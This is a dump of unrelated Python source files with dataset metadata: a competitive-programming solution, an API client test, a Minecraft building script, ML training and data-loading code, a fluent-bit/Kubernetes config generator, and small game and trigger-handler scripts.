size, mod=10**9 + 7):\n        self.size = size + 2\n        self.mod = mod\n        self.fact = [1, 1] + [0] * size\n        self.factInv = [1, 1] + [0] * size\n        self.inv = [0, 1] + [0] * size\n\n        for i in range(2, self.size):\n            self.fact[i] = self.fact[i - 1] * i % self.mod\n            self.inv[i] = -self.inv[self.mod % i] * (self.mod // i) % self.mod\n            self.factInv[i] = self.factInv[i - 1] * self.inv[i] % self.mod\n\n    def npr(self, n, r):\n        if n < r or n < 0 or r < 0:\n            return 0\n        return self.fact[n] * self.factInv[n - r] % self.mod\n\n    def ncr(self, n, r):\n        if n < r or n < 0 or r < 0:\n            return 0\n        return self.fact[n] * (self.factInv[r] * self.factInv[n - r] % self.mod) % self.mod\n\n    def factN(self, n):\n        if n < 0:\n            return 0\n        return self.fact[n]\n\ndef sol():\n    N = int(input())\n    T = []\n\n    for _ in range(N):\n        t = int(input())\n        T.append(t)\n\n    T.sort()\n\n    minTime = 0\n    now = 0\n    for t in T:\n        now += t\n        minTime += now\n\n    cntT = Counter(T)\n    comb = Combination(10100)\n    ans = 1\n\n    for _, c in cntT.items():\n        ans = (ans * comb.npr(c, c)) % MOD\n\n    print(minTime)\n    print(ans)\n\nsol()","sub_path":"AtCoder/arc/035b.py","file_name":"035b.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"627798832","text":"# -*- coding: utf-8 -*-\n\nimport unittest\n\nfrom sispy import Client, Error\n\nclass Test(unittest.TestCase):\n\n    def __init__(\n        
self, url, username, password, owner, \n test_schema_name='python_client_test',\n ):\n super(Test, self).__init__()\n\n self.url = url\n self.username = username\n self.password = password\n self.owner = owner\n self.test_schema_name = test_schema_name \n\n def setUp(self):\n self.client = Client(url=self.url)\n\n # auth\n self.client.authenticate(self.username, self.password)\n self.assertIsNotNone(self.client.auth_token)\n\n def tearDown(self):\n response = self.client.schemas.delete(self.test_schema_name)\n\n def runTest(self):\n # create schema\n content = {\n 'name': self.test_schema_name,\n 'track_history': False,\n\n '_sis': {\n 'owner': self.owner,\n },\n\n 'definition': {\n 'field1': 'Number',\n }\n }\n response = self.client.schemas.create(content)\n\n # create entities\n num = 1000\n for i in range(num):\n content = {\n 'field1': i,\n }\n response = self.client.entities(\n self.test_schema_name).create(content)\n\n # search for entitites\n response = self.client.entities(self.test_schema_name).fetch_all()\n\n self.assertIsInstance(response._result, list)\n self.assertEqual(len(response), num)\n\n # update schema\n content = {\n 'name': self.test_schema_name,\n\n '_sis': {\n 'owner': self.owner,\n },\n\n 'definition': {\n 'field1': 'Number',\n 'field2': 'String',\n }\n }\n\n response = self.client.schemas.update(self.test_schema_name, content) \n self.assertTrue('field2' in response['definition']) \n\n # delete_bulk\n response = self.client.entities(self.test_schema_name).delete_bulk(\n query = {\n 'q': { 'field1': 1 }\n }\n )\n self.assertEqual(len(response['success']), 1)\n\n # error\n self.assertRaises(\n Error,\n self.client.entities(\n 'made-up-non-existent-stuff-FAsfsd324'\n ).fetch_all,\n )\n\n","sub_path":"sispy/testsuite/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78919653","text":"import mcpi.minecraft as minecraft\n\n#NOTE - replace \"seanybob\" below with your name\nmc = minecraft.Minecraft.create(address=\"199.96.85.3\", name=\"seanybob\") \n\n#My position in the world\npos = mc.player.getPos()\n\n# This position is the bottom front right of our building (at my position)\nx = pos.x\ny = pos.y\nz = pos.z\n\n# This position is the top back left of our building.\n# Note that we are defining it in relationship to the x/y/z (bottom right front) of our building\n# That is to say, the top back left's x value is the bottom right front's x value + 10.\nx2 = x + 10\ny2 = y + 5\nz2 = z + 8\n\n#Change block ID above to something else\nmc.setBlocks(x, y, z, x2, y2, z2, 89) #89 = glowstone block ID\n\n#Make it hollow\nair_block_id = 0\nmc.setBlocks(x+1, y+1, z+1, x2-1, y2-1, z2-1, air_block_id)\n\n#Let's remove the roof, so we can add a custom more complex roof later.\n#To do this, let's make a single block tall layer that is pure air, covering the top of the cobblestone building.\n#To do this, start y at y2\nmc.setBlocks(x, y2, z, x2, y2, z2, air_block_id)\n\n#And let's add a roof. 
It will be three layers of wood, in a pyramid shape.\nmc.setBlocks(x, y2, z, x2, y2, z2, 5) #5 = wood\nmc.setBlocks(x+1, y2+1, z, x2-1, y2+1, z2, 5) #5 = wood\nmc.setBlocks(x+2, y2+2, z, x2-2, y2+2, z2, 5) #5 = wood\n","sub_path":"Example-1.py","file_name":"Example-1.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443712311","text":"import six\n\n\ndef create_transports(transports, valid_transports):\n    if not transports:\n        return [create_transport_pair(t) for t in valid_transports]\n\n    if isinstance(transports, six.string_types):\n        transports = [transports]\n    result = [\n        (transport_name, transport_options)\n        for transport in transports\n        for (transport_name, transport_options) in (create_transport_pair(transport),)\n        if transport_name in valid_transports\n    ]\n    if not result:\n        raise ValueError('No valid transports provided')\n    return result\n\n\ndef create_transport_pair(data):\n    if isinstance(data, tuple) and len(data) == 2 and isinstance(data[0], six.string_types):\n        return data\n    if isinstance(data, six.string_types):\n        return data, None\n    else:\n        raise ValueError('No valid transport provided: %r; expected name or (name, options dict)', data)\n","sub_path":"engineio/transport.py","file_name":"transport.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433156828","text":"# Model : RandomForestClassifier\n\nfrom inspect import Parameter\nimport numpy as np\n\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Dropout, Input\n\nfrom sklearn.datasets import load_iris\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.model_selection import train_test_split, KFold, cross_val_score\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\nfrom sklearn.metrics import accuracy_score\n\n# from sklearn.svm import LinearSVC, SVC\n# from sklearn.neighbors import KNeighborsClassifier\n# from sklearn.linear_model import LogisticRegression\n# from sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom xgboost import XGBClassifier\n\nimport warnings\nwarnings.filterwarnings('ignore')\nimport pandas as pd\n\n# 1. Data\n# x, y = load_iris(return_X_y=True)\n# dataset = load_iris()\n# x = dataset.data\n# y = dataset.target\n# print(dataset.DESCR)\n# print(dataset.feature_names)\n# print(x.shape, y.shape) # (150, 4) (150, )\n\ndataset = pd.read_csv('../data/csv/iris_sklearn.csv', header=0, index_col=0)\nx = dataset.iloc[:, :-1]\ny = dataset.iloc[:, -1]\nprint(x.shape, y.shape) # (150, 4) (150, )\n\nx_train, x_test, y_train, y_test = train_test_split(x, y, train_size=0.8, random_state=44)\n\n# OneHotEncoding(tensorflow)\nfrom tensorflow.keras.utils import to_categorical\n# from keras.utils.np_utils import to_categorical\n\ny = to_categorical(y)\ny_train = to_categorical(y_train)\ny_test = to_categorical(y_test)\n\nprint(y_train.shape) # (120, 3) \nprint(y_test.shape) # (30, 3)\n\nkfold = KFold(n_splits=5, shuffle=True)\n\n# 2. 
Model construction\ndef build_model(drop=0.5, optimizer='adam'):\n    inputs = Input(shape=(4,), name='input')\n    x = Dense(512, activation='relu', name='hidden1')(inputs)\n    x = Dropout(drop)(x)\n    x = Dense(256, activation='relu', name='hidden2')(x)\n    x = Dropout(drop)(x)\n    x = Dense(128, activation='relu', name='hidden3')(x)\n    x = Dropout(drop)(x)\n    outputs = Dense(3, activation='softmax', name='outputs')(x)\n    model = Model(inputs=inputs, outputs=outputs)\n    model.compile(optimizer=optimizer, metrics=['acc'],\n                  loss='categorical_crossentropy')\n    return model\n\ndef create_hyperparameters():\n    batches = [10, 20, 30, 40, 50]\n    optimizers = ['rmsprop', 'adam', 'adadelta']\n    dropout = [0.1, 0.2, 0.3]\n    return {\"batch_size\" : batches, \"optimizer\" : optimizers,\n            \"drop\" : dropout}\nhyperparameters = create_hyperparameters() \nmodel2 = build_model()\n\nfrom tensorflow.keras.wrappers.scikit_learn import KerasClassifier\nmodel2 = KerasClassifier(build_fn=build_model, verbose=1)\n\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV\n# model = GridSearchCV(SVC(), parameters, cv=kfold) # runs 100% of the parameter combinations\nsearch = RandomizedSearchCV(model2, hyperparameters, cv=kfold) # samples from the parameter combinations\n\n# 3. Training\nsearch.fit(x_train, y_train, verbose=1)\n\n# 4. Evaluation, prediction\nprint(search.best_params_) # {'optimizer': 'adam', 'drop': 0.1, 'batch_size': 20}\nprint(search.best_estimator_) # \nprint(search.best_score_) # 0.725\nacc = search.score(x_test, y_test)\nprint(\"Final score : \", acc) # Final score : 0.699999988079071\n\n# xgb\n# final accuracy 0.9416666666666667\n# 0.9416666666666667\n","sub_path":"Study/keras2/keras62_3_iris.py","file_name":"keras62_3_iris.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254998150","text":"#!/usr/bin/env python3\n\n# Function: quickly onboard new logs into es\n# Version: 1.0\n# Date: 2021-09-06\n# Author: 晓雄\n\nimport yaml\nimport jinja2\nimport os\n\nclass jinja2Handler():\n    \"\"\"\n    Collection of methods for handling templates with jinja2\n    \"\"\"\n    def __init__(self, template_path):\n        self.template_path = template_path\n\n    def create_conf_from_template(self, template_file, info_dict):\n        \"\"\"\n        Given a template file name and the matching dict data, render the config file and return the result\n        \"\"\"\n        jinjaFile = jinja2.FileSystemLoader(self.template_path) # file path\n        jinjaEnv = jinja2.Environment(loader = jinjaFile) # define the jinja2 environment\n        messageJinja = jinjaEnv.get_template(template_file) # get the template file\n\n        info = messageJinja.render(info_dict) # fill in the template from the dict\n        return(info)\n\nclass yamlHandler():\n    \"\"\"\n    Collection of methods for handling yaml files with pyyaml\n    \"\"\"\n    def __init__(self):\n        pass\n\n    def get_conf_from_yaml(self, conf_file):\n        \"\"\"\n        Read all settings from the yaml file and return them as a dict\n        \"\"\"\n        try:\n            with open(conf_file, \"r\") as f:\n                config_from_file = yaml.load_all(f, Loader = yaml.SafeLoader)\n                print(config_from_file)\n                config_list = list(config_from_file)\n                result_dict = dict()\n                for config in config_list:\n                    print(config)\n                    result_dict[list(config.keys())[0]] = config\n                print(type(result_dict),result_dict)\n                return result_dict\n        except Exception as e:\n            raise e\n\nclass fileHandler():\n    \"\"\"\n    Collection of file handling methods\n    \"\"\"\n    def __init__(self, output_path):\n        self.output_path = output_path\n\n    def write_conf_to_file(self, conf_file, content):\n        try:\n            with open(\"{}/{}\".format(self.output_path, conf_file), \"w\") as f:\n                f.write(content)\n        except Exception as e:\n            raise e\n\ndef main():\n    # create handler objects\n    jh = jinja2Handler('./templates')\n    yh = yamlHandler()\n    fh = fileHandler('./output')\n\n    # read the config file\n    all_config = yh.get_conf_from_yaml('fluent.yaml')\n\n    # 
generate the fluent-bit.conf file\n    fluent_bit_result = jh.create_conf_from_template('fluent-bit.conf.template', all_config.get('fluent'))\n    fh.write_conf_to_file('fluent-bit.conf', fluent_bit_result)\n\n    # generate the input.conf file\n    input_result = jh.create_conf_from_template('input.conf.template', all_config.get('input'))\n    fh.write_conf_to_file('input.conf', input_result)\n\n    # generate the output-elasticsearch.conf file\n    output_elasticsearch_result = jh.create_conf_from_template('output-elasticsearch.conf.template', all_config.get('input'))\n    fh.write_conf_to_file('output-elasticsearch.conf', output_elasticsearch_result)\n\n    # generate the parsers.conf file\n    parser_result = jh.create_conf_from_template('parsers.conf.template', all_config.get('parser'))\n    fh.write_conf_to_file('parsers.conf', parser_result)\n\n    # generate the fluent-bit.yaml file\n    path_list_tmp = list()\n    for i in all_config.get('input').get('input'):\n        path_list_tmp.append(i.get('path'))\n    path_list_tmp2 = list(set(path_list_tmp))\n    path_list_tmp2.sort(key = path_list_tmp.index)\n    path_list = list()\n    for i in range(len(path_list_tmp2)):\n        path_list.append({\"name\": \"path\" + str(i), \"path\": path_list_tmp2[i]})\n    fluent_bit_yaml_result = jh.create_conf_from_template('fluent-bit.yaml.template', {\"paths\": path_list})\n    fh.write_conf_to_file('fluent-bit.yaml', fluent_bit_yaml_result)\n\n    # update the generated config files into the k8s configMap\n    os.system(\"cd ./output && kubectl create configmap fluent-bit-config-es --from-file fluent-bit.conf --from-file input.conf --from-file output-elasticsearch.conf --from-file parsers.conf -o yaml --dry-run -n monitor|kubectl apply -f -\")\n\n    # apply the generated yaml to k8s and restart the pods\n    os.system(\"cd ./output && kubectl apply -f fluent-bit.yaml && kubectl get po -n monitor|grep fluent-bit-es|awk '{print $1}'|xargs kubectl delete po -n monitor --force --grace-period=0\")\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"python/cFluent/createFluentConf.py","file_name":"createFluentConf.py","file_ext":"py","file_size_in_byte":4259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370347469","text":"import csv\nimport pandas as pd\nfrom pandas import read_csv\nimport math\nimport numpy as np\nimport pickle\nfrom datetime import datetime\nimport tracemalloc\nfrom time import process_time\n\n\ndef load_data(file_path):\n    dataset = read_csv(file_path)\n    dataset.dropna(axis=0, how='any', inplace=True)\n\n    return dataset\n\n\ndef add_num(datapath, datasave):\n    dataadd = pd.read_csv(datapath)\n\n    datanew = pd.DataFrame(columns=['NVMe_total_util', 'CPU', 'Memory_used','num_workers'])\n\n    i = 4\n    num = 1\n    while (i < 404):\n        for j in range(0, 4):\n            datanew = datanew.append([{'NVMe_total_util': dataadd['NVMe_total_util'].loc[j], 'CPU': dataadd['CPU'].loc[j],\n                                       'Memory_used': dataadd['Memory_used'].loc[j], 'num_workers': num/100}], ignore_index=True)\n            i = i + 1\n\n        num = num + 1\n\n    datanew.to_csv(datasave, index=None)\n\n\ndef get_N(real_data, cluster):\n    path = real_data.split('.')\n    path_adddata = path[0] + 'a.csv'\n    add_num(real_data, path_adddata)\n    xpred = load_data(path_adddata)\n\n    # model = pickle.load(open('model/XGBoost/'+str(cluster)+'/xg_predict_n.dat', \"rb\"))\n    model = pickle.load(open('model/XGBoost/mrp/xgnt_mrp_100_new_metric.dat', \"rb\"))\n    metric = pd.read_csv('data/'+str(cluster)+'_100g_data_normalize_metrics.csv')\n\n    y_pred = model.predict(xpred)\n\n    index = np.array([i for i in range(0, 400)])\n    newfind = np.c_[y_pred, index]\n\n    findmax = newfind[np.argsort(-newfind[:, 0])]\n\n    max_index = 
np.where(findmax[:, 0] == np.amax(findmax[:, 0]))[0][0]\n max_num = findmax[max_index, 1]\n xgb_max_predmin = xpred.loc[max_num]['num_workers']\n\n num_workers = int(xgb_max_predmin * 100)\n throughput = findmax[0, 0] * metric.iloc[0][3]\n\n return num_workers, throughput\n\n\nif __name__ == '__main__':\n cluster = 'mrp'\n get_N('data/real_time_data/'+str(cluster)+'/predict/30/30_1045/74_real.csv',cluster)\n","sub_path":"N_prediction.py","file_name":"N_prediction.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"369179698","text":"class stack:\n def __init__(self):\n self.stack=[]\n self.count=0\n self.max_count=6\n self.minimum=0\n def push(self,value):\n if self.stack==[]:\n self.stack.append(value)\n self.minimum=value\n elif value Player One's card: {player_one_cards[-1]}\")\n\n\n player_two_cards = [] # Player 2's cards on the table\n player_two_cards.append(player_two.remove_one()) # Player 2 put one card on the table\n print(f\" => Player Two's card: {player_two_cards[-1]}\")\n\n at_war = True\n\n while at_war:\n\n if player_one_cards[-1].value > player_two_cards[-1].value:\n\n # Player One wins this round\n player_one_wins += 1\n\n # Player One gets the cards\n player_one.add_cards(player_one_cards)\n player_one.add_cards(player_two_cards)\n\n # No longer at \"war\", time for next round\n at_war = False\n\n elif player_one_cards[-1].value < player_two_cards[-1].value:\n\n # Player Two wins this round\n player_two_wins += 1\n\n # Player Two gets the cards\n player_two.add_cards(player_one_cards)\n player_two.add_cards(player_two_cards)\n\n # No longer at \"war\", time for next round\n at_war = False\n\n else:\n print(\"\\n========\")\n print(\" WAR!!! \")\n print(\"========\\n\")\n # This occurs when the cards are equal.\n # We'll grab another card each and continue the current war.\n\n # First check to see if player has enough cards\n\n # Check to see if a player is out of cards:\n if len(player_one.all_cards) < 5:\n print(\"\\nPlayer One unable to play war! Game Over at War.\")\n print(\"Player Two wins! Player One loses.\")\n game_on = False\n break\n\n elif len(player_two.all_cards) < 5:\n print(\"\\nPlayer Two unable to play war! Game Over at War.\")\n print(\"Player One wins! 
Player Two loses.\")\n game_on = False\n break\n # Otherwise, we're still at war, so we'll add the next cards\n else:\n for num in range(5):\n player_one_cards.append(player_one.remove_one())\n player_two_cards.append(player_two.remove_one())\n\n\n # Check if number of rounds is equal to 1000\n if round_num == 1000:\n print(\"\\n\\n\" + \"=\"*29)\n print(\"END OF GAME, TOO MUCH ROUNDS!\")\n print(\"=\" * 29)\n game_on = False\n break\n\n# Display the statistics about the game\nwins_count(player_one_wins, player_two_wins)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"462970472","text":"#!/usr/bin/python\n# Copyright 2020 The KNIX Authors\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport time\nimport json\nimport base64\n\ndef handle(event, context):\n if type(event) == type([]):\n return event\n else:\n if type(event) == type({}) \\\n and 'trigger_status' in event \\\n and 'trigger_type' in event \\\n and 'trigger_name' in event \\\n and 'workflow_name' in event \\\n and 'source' in event \\\n and 'data' in event:\n assert(event[\"trigger_type\"] == \"amqp\")\n assert(event[\"trigger_status\"] == \"ready\" or event[\"trigger_status\"] == \"error\")\n if event[\"trigger_status\"] == \"ready\":\n print(\"_!_TRIGGER_START_\" + event['trigger_name'] + \";triggers_amqp_state2;\" + event['workflow_name'] + \";\" + event['source'] + \";\" + event['data'])\n else:\n print(\"_!_TRIGGER_ERROR_\" + event['trigger_name'] + \";triggers_amqp_state2;\" + event['workflow_name'] + \";\" + event['source'] + \";\" + event['data'])\n time.sleep(1)\n return {}\n elif type(event) == type({}):\n return event\n else:\n print(\"ERROR: received event: \" + str(event))\n assert(0)\n\n\n","sub_path":"tests/triggers_amqp/python/triggers_amqp_state2.py","file_name":"triggers_amqp_state2.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"433850976","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lite', '0013_auto_20180320_1534'),\n ('room', '0008_room_status'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='pusheruser',\n name='room',\n ),\n migrations.AddField(\n model_name='pusheruser',\n name='app',\n field=models.ForeignKey(verbose_name='\\u6240\\u5c5e\\u5c0f\\u7a0b\\u5e8f', blank=True, to='lite.App', null=True),\n ),\n ]\n","sub_path":"room/migrations/0009_auto_20180322_1514.py","file_name":"0009_auto_20180322_1514.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"259474662","text":"import numpy as np\nimport random\nimport h5py\nimport os\nfrom utils.preprocess import list_filenames\nimport cv2\n\nclass InputHandle:\n def 
__init__(self, input_param, mode='train'):\n self.paths = input_param['paths']\n self.num_paths = len(input_param['paths'])\n self.name = input_param['name']\n self.input_data_type = input_param.get('input_data_type', 'float32')\n self.output_data_type = input_param.get('output_data_type', 'float32')\n self.minibatch_size = input_param['minibatch_size']\n self.is_output_sequence = input_param['is_output_sequence']\n self.down_sample = input_param['down_sample']\n self.seq_len = input_param['seq_len']\n self.horizon = input_param['horizon']\n self.mode = mode\n self.data = {}\n self.indices = {}\n self.current_position = 0\n self.current_batch_size = 0\n self.current_batch_indices = []\n self.current_input_length = 0\n self.current_output_length = 0\n self.load()\n\n @property\n def dims(self):\n return self.data['dims'][0]\n\n def load(self):\n if not os.path.exists(self.paths[0]):\n self.preprocessing(down_sample=self.down_sample, seq_len=self.seq_len, horizon=self.horizon)\n dat_1 = np.load(self.paths[0])\n for key in dat_1.keys():\n self.data[key] = dat_1[key]\n if key == 'input_raw_data' and self.data[key].max() > 1.0:\n self.data[key] = self.data[key].astype(np.float) / 255.0\n if self.num_paths == 2:\n dat_2 = np.load(self.paths[1])\n # what is clips?:\n # indices for input and output:\n num_clips_1 = dat_1['clips'].shape[1]\n dat_2['clips'][:,:,0] += num_clips_1\n # do concat\n self.data['clips'] = np.concatenate(\n (dat_1['clips'], dat_2['clips']), axis=1)\n self.data['input_raw_data'] = np.concatenate(\n (dat_1['input_raw_data'], dat_2['input_raw_data']), axis=0)\n self.data['output_raw_data'] = np.concatenate(\n (dat_1['output_raw_data'], dat_2['output_raw_data']), axis=0)\n for key in self.data.keys():\n print(key)\n print(self.data[key].shape)\n\n def total(self):\n return self.data['clips'].shape[1]\n\n def begin(self, do_shuffle = True):\n self.indices = np.arange(self.total(),dtype=\"int32\")\n if do_shuffle:\n random.shuffle(self.indices)\n self.current_position = 0\n if self.current_position + self.minibatch_size <= self.total():\n self.current_batch_size = self.minibatch_size\n else:\n self.current_batch_size = self.total() - self.current_position\n self.current_batch_indices = self.indices[\n self.current_position:self.current_position + self.current_batch_size]\n self.current_input_length = max(self.data['clips'][0, ind, 1] for ind\n in self.current_batch_indices)\n self.current_output_length = max(self.data['clips'][1, ind, 1] for ind\n in self.current_batch_indices)\n\n def next(self):\n self.current_position += self.current_batch_size\n if self.no_batch_left():\n return None\n if self.current_position + self.minibatch_size <= self.total():\n self.current_batch_size = self.minibatch_size\n else:\n self.current_batch_size = self.total() - self.current_position\n self.current_batch_indices = self.indices[\n self.current_position:self.current_position + self.current_batch_size]\n self.current_input_length = max(self.data['clips'][0, ind, 1] for ind\n in self.current_batch_indices)\n self.current_output_length = max(self.data['clips'][1, ind, 1] for ind\n in self.current_batch_indices)\n\n def no_batch_left(self):\n if self.current_position >= self.total() - self.current_batch_size:\n return True\n else:\n return False\n\n def input_batch(self):\n if self.no_batch_left():\n return None\n input_batch = np.zeros(\n (self.current_batch_size, self.current_input_length) +\n tuple(self.data['dims'][0])).astype(self.input_data_type)\n input_batch = 
np.transpose(input_batch,(0,1,3,4,2))\n for i in range(self.current_batch_size):\n batch_ind = self.current_batch_indices[i]\n begin = self.data['clips'][0, batch_ind, 0]\n end = self.data['clips'][0, batch_ind, 0] + \\\n self.data['clips'][0, batch_ind, 1]\n data_slice = self.data['input_raw_data'][begin:end, :, :, :]\n data_slice = np.transpose(data_slice, (0,2,3,1))\n input_batch[i, :self.current_input_length, :, :, :] = data_slice\n input_batch = input_batch.astype(self.input_data_type)\n\n return input_batch\n\n def output_batch(self):\n if self.no_batch_left():\n return None\n if(2 ,3) == self.data['dims'].shape:\n raw_dat = self.data['output_raw_data']\n else:\n raw_dat = self.data['input_raw_data']\n if self.is_output_sequence:\n if (1, 3) == self.data['dims'].shape:\n output_dim = self.data['dims'][0]\n else:\n output_dim = self.data['dims'][1]\n output_batch = np.zeros(\n (self.current_batch_size,self.current_output_length) +\n tuple(output_dim))\n else:\n output_batch = np.zeros((self.current_batch_size, ) +\n tuple(self.data['dims'][1]))\n for i in range(self.current_batch_size):\n batch_ind = self.current_batch_indices[i]\n begin = self.data['clips'][1, batch_ind, 0]\n end = self.data['clips'][1, batch_ind, 0] + \\\n self.data['clips'][1, batch_ind, 1]\n if self.is_output_sequence:\n data_slice = raw_dat[begin:end, :, :, :]\n output_batch[i, : data_slice.shape[0], :, :, :] = data_slice\n else:\n data_slice = raw_dat[begin, :, :, :]\n output_batch[i,:, :, :] = data_slice\n output_batch = output_batch.astype(self.output_data_type)\n output_batch = np.transpose(output_batch, [0,1,3,4,2])\n return output_batch\n\n def get_batch(self):\n input_seq = self.input_batch()\n output_seq = self.output_batch()\n batch = np.concatenate((input_seq, output_seq), axis=1)\n return batch\n\n def preprocessing(self, down_sample=1, seq_len=12, horizon=3):\n\n current_dir = os.path.dirname(self.paths[0])\n raw_data_dir = os.path.join(current_dir, self.name)\n files = list_filenames(raw_data_dir)\n num_days = len(files)\n time_slots = 288\n input_raw_data = [[], [], []]\n for f in files:\n try:\n fr = h5py.File(raw_data_dir + '/' + f, 'r')\n data = fr.get('array').value\n fr.close()\n except:\n continue\n data = np.transpose(data, (0, 3, 1, 2))\n for j in range(data.shape[1]):\n for i in range(data.shape[0]):\n tmp_data = data[i, j, :, :]\n n_rows, n_cols = tmp_data.shape\n # down sample the image\n tmp_data = cv2.resize(tmp_data, (n_cols//down_sample, n_rows//down_sample))\n input_raw_data[j].append(tmp_data)\n\n input_raw_data_channel_1 = np.stack(input_raw_data[0], axis=0) # volume\n input_raw_data_channel_2 = np.stack(input_raw_data[1], axis=0) # speed\n input_raw_data_channel_3 = np.stack(input_raw_data[2], axis=0) # heading\n\n # expand dims on axis1\n input_raw_data_channel_1 = np.expand_dims(input_raw_data_channel_1, axis=1)\n input_raw_data_channel_2 = np.expand_dims(input_raw_data_channel_2, axis=1)\n input_raw_data_channel_3 = np.expand_dims(input_raw_data_channel_3, axis=1)\n\n resulted_cols = input_raw_data_channel_1.shape[-1]\n resulted_rows = input_raw_data_channel_1.shape[-2]\n dims = np.array([[1, resulted_rows, resulted_cols]], np.int)\n\n # construct clips\n num_batches_one_day = time_slots // (seq_len + horizon)\n input_starts = np.arange(0, time_slots, (seq_len + horizon), np.int)[:num_batches_one_day]\n output_starts = np.arange(seq_len, time_slots, (seq_len + horizon), np.int)\n day_index = np.repeat(np.arange(num_days), num_batches_one_day) * time_slots\n input_starts = 
np.tile(input_starts, num_days) + day_index\n        output_starts = np.tile(output_starts, num_days) + day_index\n\n        input_seq_lens = np.array([seq_len] * (num_days * num_batches_one_day), np.int)\n        output_horizons = np.array([horizon] * (num_days * num_batches_one_day), np.int)\n        input_clips = np.stack([input_starts, input_seq_lens], axis=1)\n        output_clips = np.stack([output_starts, output_horizons], axis=1)\n        clips = np.stack([input_clips, output_clips], axis=0)\n\n        # save different files\n        volume_path = current_dir + '/{}_volume_down_sample{}.npz'.format(self.mode, down_sample)\n        speed_path = current_dir + '/{}_speed_down_sample{}.npz'.format(self.mode, down_sample)\n        heading_path = current_dir + '/{}_heading_down_sample{}.npz'.format(self.mode, down_sample)\n        np.savez(volume_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_1)\n        np.savez(speed_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_2)\n        np.savez(heading_path, dims=dims, clips=clips, input_raw_data=input_raw_data_channel_3)\n","sub_path":"data_provider/traffic4cast.py","file_name":"traffic4cast.py","file_ext":"py","file_size_in_byte":9874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"221744354","text":"import torch.nn as nn\nimport torchvision\nimport torch\nfrom typing import NewType\n\nclass ResNet50(nn.Module):\n    def __init__(self, pretrained: bool = True, num_features_out: int = 256):\n        super().__init__()\n        self.pretrained = pretrained\n        self.num_features_out = num_features_out\n        self.resnet50 = torchvision.models.resnet50(pretrained=self.pretrained)\n\n    def get_features(self):\n        features = list(self.resnet50.children())\n\n        input = nn.Sequential(*features[:4])\n        conv2 = features[4]\n        conv3 = features[5]\n        conv4 = features[6]\n        conv5 = features[7]\n\n        lateral_c2 = nn.Conv2d(in_channels=256, out_channels=self.num_features_out, kernel_size=1)\n        lateral_c3 = nn.Conv2d(in_channels=512, out_channels=self.num_features_out, kernel_size=1)\n        lateral_c4 = nn.Conv2d(in_channels=1024, out_channels=self.num_features_out, kernel_size=1)\n        lateral_c5 = nn.Conv2d(in_channels=2048, out_channels=self.num_features_out, kernel_size=1)\n\n        dealiasing_p2 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n        dealiasing_p3 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n        dealiasing_p4 = nn.Conv2d(in_channels=self.num_features_out, out_channels=self.num_features_out, kernel_size=3, padding=1)\n\n        # Freeze backbone\n        for parameters in [module.parameters() for module in [input, conv2]]:\n            for parameter in parameters:\n                parameter.requires_grad = False\n\n        module = NewType('layers',nn.Module)\n        conv_layers = (module(x) for x in (input, conv2, conv3, conv4, conv5))\n        lateral_layers = (module(x) for x in (lateral_c2, lateral_c3, lateral_c4, lateral_c5))\n        dealiasing_layers = (module(x) for x in (dealiasing_p2, dealiasing_p3, dealiasing_p4))\n\n        return conv_layers, lateral_layers, dealiasing_layers, self.num_features_out\n\n    def forward(self,x):\n        return self.resnet50(x)\n    \n","sub_path":"models/backbones/resnet50.py","file_name":"resnet50.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644464263","text":"# -*- coding: utf-8 -*-\n# @Time : 09/07/2021 02:56\n# @Author : Rodolfo Londero\n# @Email : rodolfopl@gmail.com\n# @File : test_text.py\n# 
